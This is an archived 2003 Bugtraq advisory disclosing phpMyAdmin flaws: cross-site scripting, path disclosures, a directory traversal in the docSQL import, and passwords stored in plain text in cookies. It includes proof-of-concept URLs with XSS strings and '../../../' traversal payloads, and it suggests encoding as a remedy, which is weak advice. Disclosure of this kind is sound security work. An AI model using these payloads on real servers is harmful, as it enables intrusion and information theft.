phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack , Information Encoding Weakness and Path Disclosures

From: Lorenzo Manuel Hernandez Garcia-Hierro (security_at_lorenzohgh.com)
Date: 06/18/03

  • Next message: Frank Denis: "MHFTPD vulnerability"
    Date: 18 Jun 2003 16:33:36 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    phpMyAdmin XSS Vulnerabilities, Transversal Directory Attack ,
    Information Encoding Weakness and Path Disclosures
    --------------------
    Product: phpMyAdmin
    Vendor: phpMyAdmin Development Team
    Versions:
             VULNERABLE
             
             - 2.5.2 CVS ( in Development )
             - 2.5.x
             - 2.4.x
             - 2.3.x
             - 2.2.x
             - 2.1.x
             - 2.0.x
             - 1.x.x
            
             NOT VULNERABLE
            
             - ?
    Advisory: NSRG-15-7
    ---------------------

    Description:

    phpMyAdmin is a tool written in PHP intended to handle the administration
    of MySQL over the WWW. Currently it can create and drop databases,
    create/drop/alter tables, delete/edit/add fields, execute any SQL
    statement, manage keys on fields.

    -----------------------------------------
    SECURITY HOLES FOUND and PROOFS OF CONCEPT:
    -----------------------------------------

    I encountered Cross Site Scripting Vulnerabilities and Path Disclosures
    in some files of the phpMyAdmin
    installation , with this files , sending a specially crafted url you can
    execute commands in the client
    side only and show the local path of the phpMyAdmin installation. The
    failures are related to a input validation flaw
    and a inproper configuration of php.ini and php configuration declare
    library ( declare_php.lib.php )in phpMyAdmin for the errors flags.
    I encountered a very dangerous transversal directory attack in a docSQL
    import system too.
    I discover that phpMyAdmin don't encode the mysql user and password , it
    save the data in plain text without encoding !.

    -------------------------------
    | XSS AND PATH DISCLOSURES |
    -------------------------------

    The affected files of the XSS attack ( Cross Site Scripting ) and Path
    Disclosure are:

     - sql.php / sql.php3 - Path Disclosure & XSS-
     - pdf_schema.php - Path Disclosure & XSS-
     - pdf_pages.php - Path Disclosure & XSS-
     - ldi_table.php - Path Disclosure & XSS-
     - mult_submits.inc.php - Path Disclosure & XSS-
     - chk_rel.php - Path Disclosure -
     - db_create.php - Path Disclosure -
     - db_datadict.php - Path Disclosure & XSS-
     - db_details.php - Path Disclosure -
     - db_details_common.php- Path Disclosure -
     - db_details_db_info.php - Path Disclosure -
     - db_details_export.php - Path Disclosure -
     - db_details_structure.php - Path Disclosure -
     - db_printview.php - Path Disclosure & XSS-
     - db_search.php - Path Disclosure -
     - header_printview.inc.php - Path Disclosure -
     - ldi_check.php - Path Disclosure -
     - read_dump.php - Path Disclosure & XSS-
     - tbl_addfield.php - Path Disclosure -
     - tbl_alter.php - Path Disclosure -
     - tbl_create.php - Path Disclosure -
     - tbl_dump.php - Path Disclosure -
     - tbl_move_copy.php - Path Disclosure -
     - tbl_printview.php - Path Disclosure -
     - tbl_properties.inc.php - Path Disclosure -
     - tbl_properties.php -Path Disclosure -
     - tbl_properties_common.php -Path Disclosure -
     - tbl_properties_export.php -Path Disclosure -
     - tbl_properties_links.php -Path Disclosure -
     - tbl_properties_operations.php -Path Disclosure -
     - tbl_properties_options.php -Path Disclosure -
     - tbl_properties_table_info.php -Path Disclosure -
     - tbl_query_box.php -Path Disclosure -
     - tbl_relation.php -Path Disclosure -
     - tbl_rename.php -Path Disclosure -
     - tbl_replace.php -Path Disclosure -
     - tbl_select.php -Path Disclosure -

    NOTE: The Path Disclosures occur when you access directly the affected
    file without any QUERY_STRING needing a valid session.
     The XSS can executed passing crafted query_strings to the php scripts ,
    see Samples for more info about this.

    VULNERABLE FILES TO PATH DISCLOSURES And XSS THAT DOESN'T NEED A VALID
    SESSION :

     - libraries/auth/[cookie.auth.lib.php] - Path Disclosure -
     - libraries/xpath/[XPath.class.php] - Path Disclosure -
     - libraries/[ip_allow_deny.lib.php] - Path Disclosure -
     - libraries/[select_lang.lib.php] - Path Disclosure -
     - libraries/sqlparser.lib.php - Path Disclosure -
     - libraries/db_table_exists.lib.php - Path Disclosure -
     

    -----------------------------------
    | DIRECTORY TRANSVERSAL ATTACK & |
    | REMOTE LOCAL FILE RETRIEVING & |
    | REMOTE INTERNAL DIRECTORY LISTING
    -----------------------------------

    I found a dangerous transversal directory attack in the file called
    db_details_importdocsql.php ( file import
    systems ) , i explain this failure in the Proof of Concept:

    ____Proof of Concept______

    You must send a crafted request to the db_details_importdocsql.php file :

    http://localhost/mysql/db_details_importdocsql.php?
    submit_show=true&do=import&docpath=[YOUR TRANSVERSAL DIRECTORY ATTACK]

    If you want to do a internal directory listing you must do this request:

    http://localhost/mysql/db_details_importdocsql.php?
    submit_show=true&do=import&docpath=../../../

    With this request you can list the internal directories in the root dir
    in a win installation ( normally c:\ ).

    Note that you can't request files ( only dirs ) with
    db_details_importdocsql.php if you attempt to get a file you get this
    message: This was not a Directory .

    SAMPLE RESULT OF A CGI-BIN DIRECTORY LISTED WITH THIS ATTACK:

    Server iamnottotallysecured.not

    Ignoring the file .

    Ignoring the file ..

    Ignoring the file phf.cgi // ;-)

    Ignoring the file dumpenv.pl

    Ignoring the file test-cgi // ;-)

    Ignoring the file testcgi.pl // ;-D

    Ignoring the file wwwboard.pl

    Ignoring the file count.cgi

    Ignoring the file php.cgi // ;-D

    Ignoring the file passwd.pl

    Ignoring the file admin.cgi

    Ignoring the file ftp.cgi

    Ignoring the file formmail.pl // ;-D

    Ignoring the file proxy.pl

    _______
    Samples:
    """""""
    Note that this paths are from my personal server in my testing lab:

    The target user or you must be logged in for run the attacks :

    http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>

    http://localhost/mysql/db_datadict.php?db=XSS

    http://localhost/mysql/db_details_importdocsql.php?
    submit_show=true&do=import&docpath=../../../BOOT.ini

    http://localhost/mysql/read_dump.php?
    db=nonexistent&sql_query="><h1>XSS</h1>

    http://localhost/mysql/tbl_properties_links.php?
    table_info_num_rows=10&url_query="><h1>XSS

    ------------------
    | INFORMATION |
    | ENCODING |
    | WEAKNESS |
    ------------------

    phpMyAdmin doesn't use any encoding type like BASE64/RadiX64 , only saves
    the user data ( username and password too ) in plain text without any
    encoding.

    The authentication token in the cookie is this:

    pma_cookie_username=[UserName]; lang=[language]-iso-8859-1;
    pma_cookie_password=[your password]

    A sample is:

    pma_cookie_username=god; lang=en-iso-8859-1;
    pma_cookie_password=doesnotexist

    -----------------
    | SOLUTIONS ;-p |
    -----------------

    - First: Redefine the errors flags in php.ini to Off. [Path Disclosures]
    - Second: Use a partial / secure encoding for athentication tokens like
    RadiX64 ( not very secure but an attacker
    can think that is a more secure algorithm , obscurity ;-D ) .
    - Three: Review the db_details_importdocsql.php file for prevent
    transversal directory attacks and remote local directory listing.
    -----------
    | CONTACT |
    -----------

    Lorenzo Hernandez Garcia-Hierro
     --- Computer Security Analyzer ---
     --Nova Projects Professional Coding--
     PGP: Keyfingerprint
     B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
     ID: 0x9C38E1D7
     **********************************
     NSRGroup : http://security.novappc.com
      are you totally secured ?
     ______________________


  • Next message: Frank Denis: "MHFTPD vulnerability"